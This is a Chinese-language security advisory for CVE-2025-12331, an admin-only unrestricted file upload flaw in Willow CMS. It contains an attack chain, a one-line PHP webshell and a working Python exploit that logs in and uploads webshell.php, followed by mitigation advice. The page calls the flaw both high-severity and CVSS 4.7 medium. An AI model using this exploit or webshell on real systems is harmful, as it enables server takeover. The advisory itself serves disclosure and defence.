CVE-2025-12331 Willow CMS 1.4.0 管理员无限制文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-12331

漏洞类型

无限制文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Willow CMS <= 1.4.0

漏洞概述

CVE-2025-12331是Willow CMS 1.4.0及之前版本中存在的一个高危安全漏洞。该漏洞位于管理后台的图片上传功能接口/admin/images/add，攻击者利用该漏洞可以绕过文件类型限制，上传任意文件类型的恶意文件到服务器，从而可能导致远程代码执行、敏感信息泄露等严重安全后果。

该漏洞的CVSS评分为4.7，属于中等严重程度。攻击向量为网络层面（AV:N），不需要用户交互（UI:N），但需要较高的管理员权限（PR:H）。攻击成功后，可能对系统的机密性（C:L）、完整性（I:L）和可用性（A:L）均造成较低程度的影响。

Willow CMS是一款轻量级的内容管理系统，其设计初衷是为小型网站和个人博客提供简单易用的解决方案。然而，该系统在文件上传功能的实现上存在严重的安全缺陷，未对上传文件的类型、内容和扩展名进行充分的验证和过滤。攻击者可以通过构造特殊的请求包，利用管理后台的上传功能将webshell或其他恶意文件上传至服务器，进而获得服务器的控制权。

该漏洞已于2025年10月27日公开披露，且相关利用代码已在互联网上公开。考虑到该CMS的部署范围和漏洞的利用难度，建议使用该系统的用户立即采取相应的安全措施进行修复和防护。

技术细节

漏洞存在于Willow CMS的管理后台图片上传接口/admin/images/add中。该接口在处理文件上传请求时，未对用户上传的文件类型、扩展名和内容进行充分的验证和过滤。

具体技术分析如下：

1. 文件上传验证缺失：后端代码未正确检查上传文件的MIME类型和文件扩展名，允许攻击者上传任意类型的文件，包括.php、.jsp、.asp等可执行脚本文件。

2. 文件存储路径可预测：上传的文件被存储在可预测的Web可访问目录下，攻击者可以直接通过HTTP请求访问已上传的恶意文件。

3. 文件名处理不当：服务器对上传文件的命名处理存在缺陷，可能保留原始文件名或使用可预测的命名规则，便于攻击者定位和利用已上传的webshell。

4. 权限要求：虽然该接口需要管理员权限才能访问，但一旦攻击者获取了管理员凭证（通过社会工程学、弱口令或其他方式），即可利用此漏洞上传恶意文件。

利用该漏洞的典型攻击流程：首先攻击者需要获取管理员访问权限，然后构造包含恶意代码的文件（如PHP webshell），通过/admin/images/add接口上传该文件。上传成功后，攻击者通过访问上传文件的URL来执行恶意代码，从而实现远程代码执行或进一步的攻击目的。

攻击链分析

STEP 1

步骤1

获取管理员凭证：攻击者通过社会工程学攻击、弱口令猜测或其他方式获取Willow CMS管理后台的登录凭证

STEP 2

步骤2

构造恶意文件：攻击者准备包含恶意代码的文件，如PHP webshell（<?php system($_GET['cmd']); ?>）或其他可执行脚本

STEP 3

步骤3

发送上传请求：使用获取的管理员凭证登录管理后台，通过/admin/images/add接口上传构造好的恶意文件

STEP 4

步骤4

绕过上传限制：利用文件类型验证缺陷，通过修改Content-Type或使用双扩展名等方式绕过服务器的文件上传检查

STEP 5

步骤5

访问恶意文件：上传成功后，通过预测的文件路径访问已上传的webshell，如http://target.com/uploads/images/webshell.php

STEP 6

步骤6

执行恶意代码：通过在URL中添加命令参数执行系统命令，如?cmd=whoami，从而获取服务器控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-12331 PoC - Willow CMS Unrestricted File Upload
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
import re

def exploit_cve_2025_12331(target_url, username, password, webshell_content):
    """
    Exploit for Willow CMS <= 1.4.0 unrestricted file upload vulnerability
    
    Args:
        target_url: Base URL of Willow CMS (e.g., http://target.com/willow)
        username: Admin username
        password: Admin password
        webshell_content: Content of the webshell to upload
    """
    
    session = requests.Session()
    
    # Step 1: Login to admin panel
    login_url = f"{target_url}/admin/login"
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        
        # Step 2: Upload malicious file via /admin/images/add endpoint
        upload_url = f"{target_url}/admin/images/add"
        
        # Prepare malicious file
        files = {
            'image': ('webshell.php', webshell_content, 'application/x-php')
        }
        
        upload_response = session.post(upload_url, files=files, timeout=10)
        
        # Step 3: Extract uploaded file path
        # The response may contain the uploaded file path or name
        uploaded_path = None
        if upload_response.status_code == 200:
            # Try to extract file path from response
            match = re.search(r'/uploads/images/([^\s"<>]+)', upload_response.text)
            if match:
                uploaded_path = f"{target_url}/uploads/images/{match.group(1)}"
        
        if uploaded_path:
            print(f"[+] File uploaded successfully!")
            print(f"[+] Access webshell at: {uploaded_path}")
            return uploaded_path
        else:
            print("[-] Failed to extract upload path")
            return None
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    # Example webshell content
    webshell = "<?php system($_GET['cmd']); ?>"
    
    # Usage example
    if len(sys.argv) > 3:
        target = sys.argv[1]
        user = sys.argv[2]
        pwd = sys.argv[3]
        exploit_cve_2025_12331(target, user, pwd, webshell)
    else:
        print("Usage: python3 poc.py <target_url> <username> <password>")
        print("Example: python3 poc.py http://localhost/willow admin password123")

影响范围

Willow CMS <= 1.4.0

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）立即更改所有管理后台账户的密码，确保使用强密码策略；2）限制管理后台的访问IP范围，仅允许受信任的IP地址访问/admin路径；3）在Web服务器配置中，禁止uploads目录执行PHP、ASP等脚本文件的权限；4）部署Web应用防火墙规则，检测和阻止对/admin/images/add端点的异常请求；5）暂时禁用图片上传功能，直到完成系统升级；6）启用详细的访问日志记录，密切监控管理后台的所有操作行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12331
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12331
3 Details https://www.cvedetails.com/cve/CVE-2025-12331/
4 VulDB https://vuldb.com/cve/CVE-2025-12331
5 Link https://github.com/matthewdeaves/willow/issues/132
6 Link https://vuldb.com/?ctiid.330116
7 Link https://vuldb.com/?id.330116
8 Link https://vuldb.com/?submit.674439
9 Link https://www.youtube.com/watch?v=zacD0QLUYs8